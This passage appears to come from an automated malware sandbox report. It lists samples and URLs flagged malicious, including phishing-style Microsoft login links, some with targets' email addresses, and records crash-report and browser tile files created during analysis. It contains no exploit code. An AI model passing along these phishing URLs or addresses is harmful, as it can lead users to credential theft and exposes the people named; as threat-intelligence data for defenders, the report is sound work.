	https://microsoft-quarantine.df.r.appspot.com/	Get hash	malicious	Browse	52.97.232.194
	https://storage.googleapis.com/atotalled-370566990/index.html	Get hash	malicious	Browse	52.97.186.18
	https://login-microsoft-office365-auth.el.r.appspot.com/login.microsoftonline.com/common/oauth2/authorize=vNews2&email=microsoftonline.com/common/oauth2/authorize&hashed_email=Y7XY6XCZJ3R4T4MN&utm_campaign=phx_trigger_uk_pop_email4&utm_source=photobox&utm_medium=email&uid=4978854645473&brandName=Photobox#helen@rhdb.com.au	Get hash	malicious	Browse	52.97.232.242
	https://clicktime.symantec.com/3LNDmLN9vLnK1LqGUDBbkAD6H2?u=https%3A%2F%2Foutlook.office.com%2Fmail%2Fsearch%2Fid%2Fnscglobal.com	Get hash	malicious	Browse	52.97.232.226
	https://luminous-cubist-288118.df.r.appspot.com/#lilja.b.einarsdottir@landsbankinn.is	Get hash	malicious	Browse	52.97.232.226
	https://u4882271.ct.sendgrid.net/ls/click?upn=YFyCGXB2k7XEs51EAWvRp-2BQ6xaP5-2Bxv1vyI4sITyTp6VhtJSyiu7Ungt4CUf7KdGeEBPZ7lJ0WMtGrW3-2F8wXB5kIqpkSCZwccYVceognA2U-3D57Rw_kfZ8cLppmcXDuIHKWdMrLPt30SkBa8ipQz83IjjYGp9c2flQixqYXWN470AqCFO8g1yhSwMHhN8-2BJK0vTLNC61PkTeWIrAs821yYsBfCbuclR33OfNLncv-2FtXraICcEYo4WPVv8iupWN7r8K4Ld3UpsglQggrT98vACCXZNhqlBcQYKLRD-2BBljUb02MnMpFHKiH9-2BP5uH3bAOFC4VOgSpVi86N1p2cxRMZF5Xkh4ZdU-3D	Get hash	malicious	Browse	52.97.186.114
	https://share-ointonlinekcjl5cj5k.et.r.appspot.com/#I.Artolli@sbm.mc	Get hash	malicious	Browse	52.97.186.18
	Fund Transfer PDF.htm	Get hash	malicious	Browse	52.97.232.194
	http://outlook.com/owa/airmasteraustralia.onmicrosoft.com	Get hash	malicious	Browse	52.97.232.226
	http://portal.payrolltooling.net/?id=vpqyydl7ZnKtU4usMGPqUQPtxkGlU49Be%2BH%2BAigE5ucTWat3Eej8US2xdckdOu0iDpwQIwMYKl9DLP2pKOIwIWa7isWu4stPeMJ%2BbSSC%2BrsVtg8U%2BWD1tF4Bc3%2FtEr3hJI4S3OomSDlwnU2PwUDgbmdkRVrT8Jiy8Xe4bfQ0dyp5k2o%2Bf2eztEQzNsZlKz0xjWSRZcdjYCg9vWmNNNSvSwsWNybr8UBeONKYmj4PdCOwhNBWdvur%2BK4Wx1bqcPE26q7z8kpyQ4hJ2vOCvXmdlnZ37w0%2BAGvM3H2V03OaxIsBHrlCuyiPhQWq8qdKOB4lg1EmFibK759dnK%2FawF2z6INf5IJhbtrbLVkWA6i%2FuckBPOJvVXHWYj5SHhB8X%2FZz	Get hash	malicious	Browse	52.97.232.194
	okayfreedomwr.exe	Get hash	malicious	Browse	52.97.232.194
	Cleared_Payment_Notification_1588-5755.HTml	Get hash	malicious	Browse	52.97.232.210
	ORIGINAL.EXE	Get hash	malicious	Browse	52.97.186.114

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
MICROSOFT-CORP-MSN-AS-BLOCKUS	2oxhsHaX3D.exe	Get hash	malicious	Browse	13.107.4.50
	iKcDLx5Wxc.exe	Get hash	malicious	Browse	104.43.139.144
	r6.zip.exe	Get hash	malicious	Browse	52.239.214.132
	recovered_bin2	Get hash	malicious	Browse	52.228.135.155
	Cmh_Fax-Message-3865.html	Get hash	malicious	Browse	20.199.16.46
	5.dll	Get hash	malicious	Browse	40.97.116.82
	sud-life-mobcast.apk	Get hash	malicious	Browse	104.45.180.93
	sud-life-outwork.apk	Get hash	malicious	Browse	104.45.180.93
	Flwphoptcdyxlxhpejlfjgmsyzqkhoqweu.exe	Get hash	malicious	Browse	20.80.30.45
	2790000.dll	Get hash	malicious	Browse	40.101.136.2
	2770174.dll	Get hash	malicious	Browse	40.101.136.2
	60e40fb428612.dll	Get hash	malicious	Browse	52.97.201.18
	9cYXsscTTT.exe	Get hash	malicious	Browse	104.42.151.234
	TestTakerSBBrowser.exe	Get hash	malicious	Browse	137.117.66.167
	mJSDCeNxFi.exe	Get hash	malicious	Browse	40.88.32.150
	oEE058tCoG.exe	Get hash	malicious	Browse	40.93.212.0
	zHUScMPOlZ.dll	Get hash	malicious	Browse	40.97.116.82
	hsIF8b0YX1.msi	Get hash	malicious	Browse	191.235.71.131
	x86_x64_setup.exe	Get hash	malicious	Browse	104.43.193.48
	h3hlbLDpl8.exe	Get hash	malicious	Browse	13.64.90.137
MICROSOFT-CORP-MSN-AS-BLOCKUS	2oxhsHaX3D.exe	Get hash	malicious	Browse	13.107.4.50
	iKcDLx5Wxc.exe	Get hash	malicious	Browse	104.43.139.144
	r6.zip.exe	Get hash	malicious	Browse	52.239.214.132
	recovered_bin2	Get hash	malicious	Browse	52.228.135.155
	Cmh_Fax-Message-3865.html	Get hash	malicious	Browse	20.199.16.46
	5.dll	Get hash	malicious	Browse	40.97.116.82
	sud-life-mobcast.apk	Get hash	malicious	Browse	104.45.180.93
	sud-life-outwork.apk	Get hash	malicious	Browse	104.45.180.93
	Flwphoptcdyxlxhpejlfjgmsyzqkhoqweu.exe	Get hash	malicious	Browse	20.80.30.45
	2790000.dll	Get hash	malicious	Browse	40.101.136.2
	2770174.dll	Get hash	malicious	Browse	40.101.136.2
	60e40fb428612.dll	Get hash	malicious	Browse	52.97.201.18
	9cYXsscTTT.exe	Get hash	malicious	Browse	104.42.151.234
	TestTakerSBBrowser.exe	Get hash	malicious	Browse	137.117.66.167
	mJSDCeNxFi.exe	Get hash	malicious	Browse	40.88.32.150
	oEE058tCoG.exe	Get hash	malicious	Browse	40.93.212.0
	zHUScMPOlZ.dll	Get hash	malicious	Browse	40.97.116.82
	hsIF8b0YX1.msi	Get hash	malicious	Browse	191.235.71.131
	x86_x64_setup.exe	Get hash	malicious	Browse	104.43.193.48
	h3hlbLDpl8.exe	Get hash	malicious	Browse	13.64.90.137

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_rundll32.exe_4323c1d7a32576d87639b5d887c5a93fe7aab20_82810a17_06e156cd\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	12274
Entropy (8bit):	3.7606060797507106
Encrypted:	false
SSDEEP:	192:orivB0oXSHygO+jed+k/u7skS274ItWcb:sinXqygO+jeR/u7skX4ItWcb
MD5:	E1949ED2D76CA2F7E656F75525C7214A
SHA1:	5B0DE9CE68B04F1D3B9D47663E295C08915D5B48
SHA-256:	E8046A932885BEEB5825A245B4FE4E4D8DF59F8BA5AFF5CE4936E80039FE0BC4
SHA-512:	AC9E9CE727C490D0AC9D14D4EB520D2DB606E8C0FF500801B52F0082CFF2D65E20A9593223CC73249072D8FFD5C72EB932A8ACD3B1985C964B586669EB895F2A
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.7.0.3.4.3.0.8.1.4.0.3.0.4.4.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.7.0.3.4.3.0.8.8.7.6.2.4.0.4.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.4.3.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.c.c.6.c.e.2.7.-.4.8.f.2.-.4.c.d.a.-.b.b.9.d.-.f.9.7.6.2.5.a.c.d.9.1.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.6.5.e.4.e.5.f.-.1.4.6.7.-.4.0.4.a.-.a.e.2.9.-.f.1.0.6.8.6.6.1.0.8.b.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.6.6.0.-.0.0.0.1.-.0.0.1.7.-.0.9.5.f.-.1.8.0.2.1.1.7.5.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER301B.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Jul 9 22:24:43 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	60620
Entropy (8bit):	1.9423513089497042
Encrypted:	false
SSDEEP:	192:EJWIVZo6IqaxddJaMiFNG9NLtW5CunXlcW8YGUvDcWChpjCOmHtasnomQNqpW:WWI7olJxdbaMZ9FtWs2+WfLc9hCOuRh8
MD5:	1380CF80AF689C5D543F9B1B8986CDD8
SHA1:	B1C78C558C739C72F7196C32387B31CFDBF06761
SHA-256:	817B2C2DE7DBD5A81947B3D95CA0B129979E7A91AD1E91AC40B37C23DBF7ED9D
SHA-512:	F6B2994752EC0B2219832DEE02E10BE6C0A4135D4DE82034F35522ABEC0E8F382F7F26D078B3E2FDC531297A3D1EABEBF685371EBCE554B81D6FC590F922C522
Malicious:	false
Reputation:	low
Preview:	MDMP....... ..........`...................U...........B......`.......GenuineIntelW...........T.......`...R..`.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3ADA.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8298
Entropy (8bit):	3.691360413633455
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiLR64pP26Y+V6sygmfTkOSzCpDO89bTOsfkRm:RrlsNi96KP26Yk65gmfTkOSUTNfP
MD5:	FF60444ABF2A813A7A238F2090DDF462
SHA1:	F5F60E50620687E086BA77DE4EC6FBA1244D31E4
SHA-256:	615243FDCD5BE5E6BF8412BB2BCDECE152E85883035283F04323D15B87FB5812
SHA-512:	5A0C913CB7C718C38556DC03EDE5CE97C50EDCFE18703559E07B65ADDCE32761716F13D46BD5A5362C0A0A4EF3BDF438F17741635A9EDA55B749D3ADBC270229
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.6.3.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER3DF8.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4630
Entropy (8bit):	4.450079077396599
Encrypted:	false
SSDEEP:	48:cvIwSD8zs1JgtWI9r6P4WSC8BY8fm8M4JCds9FGx+q8/5q4SrS8ad:uITfPd5SN7JUxhDW/d
MD5:	56585D25B96640D7B66A5F2EBBA9D865
SHA1:	4B804FF08F079C98479A38C534F4851105E50D8C
SHA-256:	DEA4C309F7BE0022283E2B78CFFE988C01CDDCBA96039838674633FD11485029
SHA-512:	ADB806984E748F66AA5AFE42C06BFFD3638B9A3ECD8C364CE6776D7EF08531DDA96D32A3C6524FCEC083A9F84B61417899F834166CDD267C1EC994A2F3418844
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1070375" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{6C6C1DA9-E104-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.7675208968892673
Encrypted:	false
SSDEEP:	48:Iw30GcprZfGwpLjGhG/ap8OtGIpcUwGWGvnZpvUtGogqp9UEGo4hpmUCGWuOEGW+:r3oZZpZjk2OfWUwetUTfU/hMUNoJVB
MD5:	21006F3BE1A506E4B2D3A7D675C3EBDD
SHA1:	4B46C9F4156FBE672987AC7BA44D9E3B12D452AF
SHA-256:	2A15B6133068778BA036876E43A2519E38433920A31EFB23BAA08013BEA921D2
SHA-512:	643BE0C532B07CDF93D7791294D387ED353A34ED50A554C1840E32F350684DBB5A5D7C9DCEF9FD0F3D2A1CE95284A0B6A73EE87B2933E3E991778B0BDFADA358
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{6C6C1DAB-E104-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27388
Entropy (8bit):	1.8492333825151834
Encrypted:	false
SSDEEP:	96:rpZeQ668BSOj12tWdMBOqQF/9PRqQF/9MpA:rpZeQ668kOj12tWdMBOqCFPRqCF0A
MD5:	FE9CCD814B0F8DDE2AB3DABF6420BE47
SHA1:	4A13D13C7681D3625C0A877A59D47CB2F4F3237D
SHA-256:	C6622CFBD0FC7E8D998683132E490EFC4B9DEDC4AEA47F90409C93C95E014B65
SHA-512:	286A8FE0ABB4D960C91A2628A664236A54FBD90FF60597FE68137E07471D2F212C59DB298B680C2CB752B5F57B2C689120B2C89E422001CB4754183316DAFD53
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.1203165948199825
Encrypted:	false
SSDEEP:	12:TMHdNMNxOE8AeZ7AeZAnWimI002EtM3MHdNMNxOE8AeZ7AeZAnWimI00ObVbkEty:2d6NxOplqSZHKd6NxOplqSZ76b
MD5:	8D599BEF9D241754D23ECCECFD30C7A6
SHA1:	51A406A8931432436C370EA1078E7BE3FA17889D
SHA-256:	2C23AA2A761171E479E8DA74AF011AEDA89AD4ABEE4FAEBF3DD0496EFA5AFE2D
SHA-512:	5B0A837124CE8EDFB3188256F3EE28A78577070A0176CFDE0FB5576D2922AB1340C392BBF7F07683F9108561B46D08579D806E067D7669723E8DC363676DBA38
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.134563004044832
Encrypted:	false
SSDEEP:	12:TMHdNMNxe2k86Z76ZAnWimI002EtM3MHdNMNxe2k86Z76ZAnWimI00Obkak6EtMb:2d6NxrJIfSZHKd6NxrJIfSZ7Aa7b
MD5:	4968B66BBB4A88C515D2C48C5F7D86FE
SHA1:	9A7A7C9FCC6E181E0AC824DB06D7CE4504F7421C
SHA-256:	FE0A0417B43404C5378D17300F8DA55E8A75E852BBE027A5DC3F6D82C0E6ED64
SHA-512:	3EB1E1738241EA8A8D59906A5FBF17E7AA0588C065377687CA8D3FCB791418235D9FC44F3BD016D441AF009FA7FC2C58DC454111186F470A0368D323F88D0362
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x441e92db,0x01d77511</date><accdate>0x441e92db,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x441e92db,0x01d77511</date><accdate>0x441e92db,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	662
Entropy (8bit):	5.139226419193965
Encrypted:	false
SSDEEP:	12:TMHdNMNxvL8AeZ7AeZAnWimI002EtM3MHdNMNxvL8AeZ7AeZAnWimI00ObmZEtMb:2d6NxvglqSZHKd6NxvglqSZ7mb
MD5:	E65305058781D1E10E76451B366CC50B
SHA1:	A4D4324D1D8A0807B3252A6CC897B2ADAB930F7E
SHA-256:	248168AC56792FD9991B18F14E4B5AE6117F9BE7AA56800E97BBD5CF7FCFA199
SHA-512:	D9B19329BE9172E086822E4FCA3B21F431C1BC201C992E75FC2DD73D61582628D0A3A38747DE74031E720A52B080F0D691CBEA6F474B76A77427556720CFD091
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	647
Entropy (8bit):	5.136436978120072
Encrypted:	false
SSDEEP:	12:TMHdNMNxi8AeZ7AeZAnWimI002EtM3MHdNMNxi8AeZ7AeZAnWimI00Obd5EtMb:2d6Nx3lqSZHKd6Nx3lqSZ7Jjb
MD5:	C6E669BDEEEAB022234DE6E073CDF6EB
SHA1:	B511F8C524D80A8C2FDFE95BDA8F8D3E0D291F37
SHA-256:	F2CFC7DA7D96C261CEE7A5D4F2A9662543CA5293B05EDDDB9277CDCB077471CC
SHA-512:	7C108964C022559DB1014A2AADACEA1395FBA223B106F846EAFA16B1F1C0675F6B3C6A81B0B51A9DEEC416F8472E6E4AB835B1593953AA771CD4E565CCFAE818
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.151417094368856
Encrypted:	false
SSDEEP:	12:TMHdNMNxhGw8AeZ7AeZAnWimI002EtM3MHdNMNxhGw8AeZ7AeZAnWimI00Ob8K0z:2d6NxQVlqSZHKd6NxQVlqSZ7YKajb
MD5:	BD0CE2FC38BCF545CAB4BE1835DC5E18
SHA1:	A664B1DB83548D55CA28B2EBB79451A2749107D8
SHA-256:	E1C0BED752BBC87034EA8863531BAB3922A3E6F8E08BF981200C17DDEAC8F2A1
SHA-512:	32BB1B156E95FAED8525354D0A145EE4BCFBA0E5DD6FAD8C7EEB6D1BC2BCA147B014C487105261FEB988526A0EE9A16F63F5AF2F7A972C0C8CF78A964F8CB2E1
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	653
Entropy (8bit):	5.123606740322444
Encrypted:	false
SSDEEP:	12:TMHdNMNx0n8AeZ7AeZAnWimI002EtM3MHdNMNx0n8AeZ7AeZAnWimI00ObxEtMb:2d6Nx08lqSZHKd6Nx08lqSZ7nb
MD5:	F3FAA80C08BA5526AB523C40946E247E
SHA1:	6A1E77975DB7D3AC5B0FBE42A3914BD443628F5C
SHA-256:	D449DCB79EC7D2030DFB93AF8BED6A3085BB42166B673476092D78309301A397
SHA-512:	70C9AFB28FDDED7E6F06C56A292AA936CA682F9817102E15EAA8CDEFD8BF472BF822EF8FD47FC1D484CB076D532220B18F39E91E8A0AC3064F0DDC60A9C3C1B7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20259167780\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	656
Entropy (8bit):	5.160740296090679
Encrypted:	false
SSDEEP:	12:TMHdNMNxx8AeZ7AeZAnWimI002EtM3MHdNMNxx8AeZ7AeZAnWimI00Ob6Kq5EtMb:2d6Nx2lqSZHKd6Nx2lqSZ7ob
MD5:	48714DF7C36784927086738C16F5C2A4
SHA1:	C324557392A9AF2D1AD017801F5FC5A957CC6F52
SHA-256:	C9E7147C35DE4F86CA8D51D49FB2F0814D1782BDD79247FDC593CD315C0DC771
SHA-512:	381DDB57101A933CFDC76B412D6DD4B51EE2FEDF06B865CC560A66CE53FB52B751B458A98A47FCBE46CB7FF2403C44B26508B4A5D9C0B8ABAAF00E48D80F498D
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.nytimes.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\NYTimes.url"/></tile></msapplication></browserconfig>..

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin20332743330\msapplication.xml Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	659
Entropy (8bit):	5.137318022838918
Encrypted:	false
SSDEEP:	12:TMHdNMNxc8AeZ7AeZAnWimI002EtM3MHdNMNxc8AeZ7AeZAnWimI00ObVEtMb:2d6NxRlqSZHKd6NxRlqSZ7Db
MD5:	697674F7D0D805F23E186232B6424E05
SHA1:	DCA130BAD20BDAAF493075711E0FE57A9A3B3E66
SHA-256:	530058573C14408B947F9CD92DCE93C2AFC8277D87440BF8DDF364F3EB4C7A8A
SHA-512:	F04C1267D749CE5230A6C2CD42AADE9847650A33020CA2D7DE18F3D5E0FAC65BD796110DE93F958244D8010E8A955367FBA6878077EF46689E90976C1368724F
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x4425ba91,0x01d77511</date><accdate>0x4425ba91,0x01d77511</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig>..

